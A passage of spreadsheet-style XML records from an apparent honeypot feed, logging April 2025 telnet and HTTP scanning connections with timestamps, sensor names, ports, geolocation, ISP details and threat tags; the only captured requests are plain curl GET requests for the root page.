    <m/>
    <m/>
  </r>
  <r>
    <x v="1718"/>
    <x v="1718"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T03:21:04"/>
    <d v="2025-04-15T03:21:04"/>
    <d v="2025-04-15T03:21:04"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:59b1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1719"/>
    <x v="1719"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T03:18:51"/>
    <d v="2025-04-15T03:18:51"/>
    <d v="2025-04-15T03:18:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="NA"/>
    <s v="Ho Chi Minh City"/>
    <s v="1566083"/>
    <s v="NA"/>
    <s v="10.823"/>
    <s v="106.63"/>
    <s v="7552"/>
    <s v="VIETEL-AS-AP"/>
    <s v="Viettel Corporation"/>
    <s v="consumer"/>
    <s v="Vietel"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abef:bf77"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1720"/>
    <x v="1720"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T03:17:33"/>
    <d v="2025-04-14T21:13:49"/>
    <d v="2025-04-15T03:17:33"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:8b46"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1721"/>
    <x v="1721"/>
    <s v="220-132-148-108.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T03:10:17"/>
    <d v="2023-12-16T23:33:42"/>
    <d v="2025-04-15T03:10:17"/>
    <n v="310"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;48490&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:946c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1722"/>
    <x v="1722"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T03:06:08"/>
    <d v="2025-04-15T03:00:44"/>
    <d v="2025-04-15T03:06:08"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Caieiras"/>
    <s v="Caieiras"/>
    <s v="3468215"/>
    <s v="NA"/>
    <s v="-23.3642"/>
    <s v="-46.7406"/>
    <s v="26599"/>
    <s v="TELEFÔNICA BRASIL S.A"/>
    <s v="Vivo"/>
    <s v="business"/>
    <s v="TELEF�NICA BRASIL S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b374:1b41"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1723"/>
    <x v="1723"/>
    <s v="220-132-181-221.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T03:01:52"/>
    <d v="2023-12-03T18:35:00"/>
    <d v="2025-04-15T03:01:52"/>
    <n v="534"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;43325&amp;&amp;23&amp;&amp;80&amp;&amp;11658&amp;&amp;46991&amp;&amp;47010&amp;&amp;9100&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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:b5dd"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1724"/>
    <x v="1724"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T02:49:55"/>
    <d v="2025-04-15T02:49:55"/>
    <d v="2025-04-15T02:49:55"/>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d:73da"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1725"/>
    <x v="1725"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T02:42:42"/>
    <d v="2025-04-15T02:42:42"/>
    <d v="2025-04-15T02:42:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:a65f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1726"/>
    <x v="1726"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T02:41:32"/>
    <d v="2025-04-15T02:41:32"/>
    <d v="2025-04-15T02:41:32"/>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7:d5d4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1727"/>
    <x v="1727"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T02:34:09"/>
    <d v="2025-04-15T02:33:46"/>
    <d v="2025-04-15T02:34:09"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f1:56b2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1728"/>
    <x v="1728"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T02:25:42"/>
    <d v="2025-04-15T02:25:42"/>
    <d v="2025-04-15T02:25:42"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b59:cb34"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1729"/>
    <x v="1729"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T02:24:17"/>
    <d v="2025-04-14T22:03:28"/>
    <d v="2025-04-15T02:24:17"/>
    <n v="56"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kampung Attap)"/>
    <s v="1735161"/>
    <s v="50460"/>
    <s v="3.13687"/>
    <s v="101.694"/>
    <s v="4788"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="Telekom Malaysia Berhad"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af88:d774"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1730"/>
    <x v="1730"/>
    <s v="220-134-6-194.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T02:14:51"/>
    <d v="2023-10-07T00:46:00"/>
    <d v="2025-04-15T02:14:51"/>
    <n v="22287"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5856&amp;&amp;4145&amp;&amp;59399&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100"/>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login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:6c2"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1731"/>
    <x v="1731"/>
    <s v="59-126-25-244.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T02:13:13"/>
    <d v="2023-07-26T01:06:09"/>
    <d v="2025-04-15T02:13:13"/>
    <n v="1712"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_SSH_H37&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;1080&amp;&amp;22&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;63175&amp;&amp;50447&amp;&amp;55629&amp;&amp;55639&amp;&amp;55644&amp;&amp;55647&amp;&amp;55653&amp;&amp;55655&amp;&amp;9100&amp;&amp;NA"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:19f4"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1732"/>
    <x v="1732"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T02:12:34"/>
    <d v="2025-03-30T10:38:34"/>
    <d v="2025-04-15T02:12:34"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="38"/>
    <s v="Kayseri"/>
    <s v="NA"/>
    <s v="Kayseri"/>
    <s v="308464"/>
    <s v="NA"/>
    <s v="38.7205"/>
    <s v="35.4826"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TTNet A.S."/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5f09:4bd8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1733"/>
    <x v="1733"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T02:11:48"/>
    <d v="2024-12-24T17:53:06"/>
    <d v="2025-04-15T02:11:48"/>
    <n v="177"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Hsinchu County"/>
    <s v="Xinli"/>
    <s v="11703047"/>
    <s v="NA"/>
    <s v="24.1047"/>
    <s v="120.681"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7476:a10e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1734"/>
    <x v="1734"/>
    <s v="NA&amp;&amp;114-34-15-131.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-15T02:11:22"/>
    <d v="2023-12-02T07:54:00"/>
    <d v="2025-04-15T02:11:22"/>
    <n v="741"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;62920&amp;&amp;23&amp;&amp;9100&amp;&amp;80&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7222:f83"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1735"/>
    <x v="1735"/>
    <s v="220-134-68-227.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T02:10:32"/>
